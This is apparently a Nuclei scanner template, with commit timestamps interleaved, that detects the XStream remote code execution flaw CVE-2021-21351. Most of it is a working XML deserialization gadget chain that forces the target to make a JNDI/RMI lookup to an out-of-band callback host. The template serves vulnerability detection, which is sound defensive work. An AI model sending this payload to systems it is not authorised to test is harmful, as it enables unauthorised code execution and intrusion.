2023-03-12 03:38:05 +00:00
id : CVE-2021-21351
info :
2023-04-12 18:59:13 +00:00
name : XStream <1.4.16 - Remote Code Execution
2023-03-12 03:38:05 +00:00
author : pwnhxl
2023-03-29 20:18:04 +00:00
severity : critical
2023-03-23 11:21:46 +00:00
description : |
2023-04-12 18:59:13 +00:00
XStream before 1.4.16 is susceptible to remote code execution. An attacker can load and execute arbitrary code from a remote host via manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
2023-09-06 12:09:01 +00:00
remediation : Install at least 1.4.16 if you rely on XStream's default blacklist of the Security Framework.
2023-03-12 03:38:05 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/xstream/CVE-2021-21351
- https://x-stream.github.io/CVE-2021-21351.html
- https://paper.seebug.org/1543/
2023-03-29 20:18:04 +00:00
- http://x-stream.github.io/changes.html#1.4.16
2023-04-12 18:59:13 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2021-21351
2023-03-29 20:18:04 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
cvss-score : 9.1
cve-id : CVE-2021-21351
2023-07-11 19:49:27 +00:00
cwe-id : CWE-434
2023-10-27 16:34:45 +00:00
epss-score : 0.94706
2023-11-03 15:51:18 +00:00
epss-percentile : 0.99018
2023-09-06 12:09:01 +00:00
cpe : cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2023-07-11 19:49:27 +00:00
vendor : xstream_project
product : xstream
tags : cve,cve2021,xstream,deserialization,rce,oast,vulhub
2023-03-12 03:38:05 +00:00
2023-04-27 04:28:59 +00:00
http :
2023-03-12 03:38:05 +00:00
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<sorted-set>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XRTreeFrag'>
<m__DTMXRTreeFrag>
<m__dtm class='com.sun.org.apache.xml.internal.dtm.ref.sax2dtm.SAX2DTM'>
<m__size>-10086</m__size>
<m__mgrDefault>
<__overrideDefaultParser>false</__overrideDefaultParser>
<m__incremental>false</m__incremental>
<m__source__location>false</m__source__location>
<m__dtms>
<null/>
</m__dtms>
<m__defaultHandler/>
</m__mgrDefault>
<m__shouldStripWS>false</m__shouldStripWS>
<m__indexing>false</m__indexing>
<m__incrementalSAXSource class='com.sun.org.apache.xml.internal.dtm.ref.IncrementalSAXSource_Xerces'>
<fPullParserConfig class='com.sun.rowset.JdbcRowSetImpl' serialization='custom'>
<javax.sql.rowset.BaseRowSet>
<default>
<concurrency>1008</concurrency>
<escapeProcessing>true</escapeProcessing>
<fetchDir>1000</fetchDir>
<fetchSize>0</fetchSize>
<isolation>2</isolation>
<maxFieldSize>0</maxFieldSize>
<maxRows>0</maxRows>
<queryTimeout>0</queryTimeout>
<readOnly>true</readOnly>
<rowSetType>1004</rowSetType>
<showDeleted>false</showDeleted>
<dataSource>rmi://{{interactsh-url}}/test</dataSource>
<listeners/>
<params/>
</default>
</javax.sql.rowset.BaseRowSet>
<com.sun.rowset.JdbcRowSetImpl>
<default/>
</com.sun.rowset.JdbcRowSetImpl>
</fPullParserConfig>
<fConfigSetInput>
<class>com.sun.rowset.JdbcRowSetImpl</class>
<name>setAutoCommit</name>
<parameter-types>
<class>boolean</class>
</parameter-types>
</fConfigSetInput>
<fConfigParse reference='../fConfigSetInput'/>
<fParseInProgress>false</fParseInProgress>
</m__incrementalSAXSource>
<m__walker>
<nextIsRaw>false</nextIsRaw>
</m__walker>
<m__endDocumentOccured>false</m__endDocumentOccured>
<m__idAttributes/>
<m__textPendingStart>-1</m__textPendingStart>
<m__useSourceLocationProperty>false</m__useSourceLocationProperty>
<m__pastFirstElement>false</m__pastFirstElement>
</m__dtm>
<m__dtmIdentity>1</m__dtmIdentity>
</m__DTMXRTreeFrag>
<m__dtmRoot>1</m__dtmRoot>
<m__allowRelease>false</m__allowRelease>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>ysomap</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>test</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</sorted-set>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "dns"
2023-03-22 09:34:01 +00:00
2023-03-23 11:21:46 +00:00
- type : word
part : body
words :
- "timestamp"
2023-04-05 00:47:42 +00:00
- "com.thoughtworks.xstream"
condition : or
2023-03-23 11:21:46 +00:00
- type : word
part : header
words :
- "application/json"
2023-03-22 09:34:01 +00:00
- type : status
status :
2023-03-24 16:22:14 +00:00
- 500
2023-11-05 22:23:39 +00:00
# digest: 4a0a00473045022100d6908fdd2a557c03bfc5a3481f6767a325d35dbcb8840ba05c8faf804ca3f7a602204d0b3bffbdf7f041e56c1e44eb6ee5b80394469be0808bfdaa3a346e789be2c5:922c64590222798bb761d5b6d8e72950